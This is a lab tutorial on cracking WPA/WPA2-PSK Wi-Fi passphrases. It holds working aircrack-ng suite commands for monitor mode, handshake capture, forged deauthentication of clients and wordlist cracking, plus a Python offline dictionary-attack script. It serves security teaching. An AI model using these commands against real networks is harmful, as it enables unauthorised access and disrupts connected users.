Cracking WPA / WPA2
WPA
--> Wi-Fi Protected Access
--> Uses TKIP (Temporal Key Integrity Protocol), an RC4-based scheme designed to run on old WEP hardware
WPA2
--> Wi-Fi Protected Access 2
--> Uses CCMP (Counter mode with Cipher block Chaining Message authentication code Protocol), AES-based encryption
--> In enterprise mode (802.1X) a RADIUS (Remote Authentication Dial-In User Service) server manages client authentication; in personal mode (WPA2-PSK, the target of this lab) every client shares one pre-shared key derived from the Wi-Fi passphrase and the SSID
Deliverable:
Lab Set up
Attacker’s System: Kali Linux
Target : Access Point or Router with WPA / WPA2 security
In Kali Linux --> Terminal
1. WPA / WPA2-PSK cannot be cracked directly. A capture gives you only the four-way handshake, and the handshake carries a MIC that lets you test passphrase guesses offline; the passphrase itself is never transmitted. For cracking this, we need a wordlist: a file containing candidate passwords, one per line. It can be downloaded from the internet (Kali ships /usr/share/wordlists/rockyou.txt.gz), built from information gathered by social engineering, or generated with tools such as crunch or cewl. If the real passphrase is not in the wordlist, the attack fails.
2. To put wlan0 in monitor mode
~# airmon-ng check kill
~# airmon-ng start wlan0
Here, wlan0 --> wireless interface
check kill --> stops NetworkManager / wpa_supplicant, which otherwise reset the channel behind your back
Note: recent aircrack-ng versions name the monitor interface wlan0mon instead of mon0. This lab writes mon0 throughout; substitute whatever name airmon-ng prints.
3. To check available access points
~# airodump-ng mon0
Here, mon0 --> interface for monitor mode
Note down the BSSID, channel number (CH column) and ESSID of the target, plus the MAC addresses of clients listed under STATION.
4. To capture all the traffic of target access point
~# airodump-ng -c [channel number] --bssid [MAC address of access point] -w [filename] mon0
Here, -c --> channel
[channel number] --> channel number used by access point
--bssid --> Basic Service Set Identification (MAC address of router)
-w --> write to file
[filename] --> name prefix of the capture file; airodump-ng appends a counter, so the first file is [filename]-01.cap
mon0 --> interface for monitor mode
5. Now, to get one valid handshake, we de-authenticate an authenticated client so that it reconnects. Run this in a second terminal while step 4 keeps capturing.
~# aireplay-ng --ignore-negative-one --deauth 1 -e [ESSID of access point] -c [MAC address of one of the connected client devices] mon0
Here, --ignore-negative-one --> needed when the driver reports the channel as -1 (fixed channel mismatch); harmless otherwise
1 --> number of deauthentication rounds to send
-e --> ESSID (name of the router or access point); -a [BSSID] can be used instead, and is unambiguous when several networks share a name
-c --> MAC address of the client to kick off; omit it to deauthenticate all clients via broadcast
mon0 --> interface for monitor mode
--deauth --> sends forged deauthentication frames so the client reconnects and performs a fresh four-way handshake. The airodump-ng window from step 4 shows "WPA handshake: [BSSID]" in its top line once the handshake has been captured; stop there, repeated deauths are noisy and unnecessary.
6. Cracking WPA / WPA2 using the wordlist
~# aircrack-ng -w [wordlist file] -b [MAC address of access point] [filename]-01.cap
Here, -w --> wordlist
-b --> BSSID, selects the target network when the capture contains more than one
aircrack-ng prints "KEY FOUND! [ passphrase ]" on success. Each candidate costs 4096 PBKDF2 iterations, so large wordlists are slow on a CPU; the same handshake can be converted and cracked on a GPU with hashcat.
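The following is an added worked example, not part of the original lab notes and not aircrack-ng's code. It reproduces in Python what step 6 does with the capture from steps 4 and 5: derive the PMK from each candidate passphrase with PBKDF2, expand it to the PTK with the 802.11 PRF, and compare the EAPOL MIC computed with the KCK against the MIC in the captured handshake message. The handshake (SSID, MACs, nonces, EAPOL frame) is constructed inline from a known passphrase so the script runs offline; everything in SAMPLE_HANDSHAKE and WORDLIST is made up for illustration.

```python
"""Offline WPA/WPA2-PSK dictionary attack against a four-way handshake.

Added example: shows the computation behind `aircrack-ng -w wordlist capture.cap`.
All capture data below is constructed, not taken from a real network.
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    # The 4096 iterations are the expensive part of every guess.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    # IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || counter),
    # concatenated for counter = 0,1,2,3 and truncated to 64 bytes.
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_kck(pmk: bytes, ap_mac: bytes, client_mac: bytes,
               anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||
    #               min(ANonce,SNonce)||max(ANonce,SNonce)); KCK = first 16 bytes.
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes, wpa2: bool = True) -> bytes:
    # WPA2 (key descriptor version 2) uses HMAC-SHA1, WPA/TKIP (version 1) HMAC-MD5;
    # either way the MIC is the first 16 bytes over the frame with its MIC field zeroed.
    digest = hmac.new(kck, eapol_mic_zeroed, hashlib.sha1 if wpa2 else hashlib.md5).digest()
    return digest[:16]


def crack(handshake: dict, wordlist, wpa2: bool = True):
    """Return the passphrase whose derived KCK reproduces the captured MIC, else None."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, handshake["ssid"])
        kck = derive_kck(pmk, handshake["ap_mac"], handshake["client_mac"],
                         handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"], wpa2), handshake["mic"]):
            return candidate
    return None


def build_eapol_msg2(snonce: bytes) -> bytes:
    # Constructed minimal EAPOL-Key frame for handshake message 2 with the MIC
    # field zeroed (a real frame also carries the RSN IE in the key data).
    body = (b"\x02"                    # descriptor type: RSN
            + b"\x01\x0a"              # key info: version 2 (HMAC-SHA1), pairwise, MIC
            + b"\x00\x10"              # key length 16 (CCMP)
            + (1).to_bytes(8, "big")   # replay counter
            + snonce                   # 32-byte SNonce
            + bytes(16) + bytes(8) + bytes(8)   # key IV, RSC, ID
            + bytes(16)                # MIC field, zeroed for computation
            + b"\x00\x00")             # key data length
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def make_sample_handshake(passphrase: str) -> dict:
    # Constructed capture: fixed MACs and nonces, MIC computed from the true passphrase.
    hs = {
        "ssid": "HomeNet",
        "ap_mac": bytes.fromhex("001122334455"),
        "client_mac": bytes.fromhex("66778899aabb"),
        "anonce": bytes(range(32)),
        "snonce": bytes(range(32, 64)),
    }
    hs["eapol"] = build_eapol_msg2(hs["snonce"])
    kck = derive_kck(pmk_from_passphrase(passphrase, hs["ssid"]), hs["ap_mac"],
                     hs["client_mac"], hs["anonce"], hs["snonce"])
    hs["mic"] = eapol_mic(kck, hs["eapol"])
    return hs


SAMPLE_HANDSHAKE = make_sample_handshake("sunflower2019")
WORDLIST = ["password", "12345678", "sunflower2019", "letmein"]   # constructed

if __name__ == "__main__":
    print("KEY FOUND!", crack(SAMPLE_HANDSHAKE, WORDLIST))
```

Only the MIC in message 2 (or 3) is needed to test a guess, which is why airodump-ng needs just one complete handshake and why nothing else in the capture helps: the passphrase never crosses the air, so a wordlist miss means no result, exactly as aircrack-ng reports.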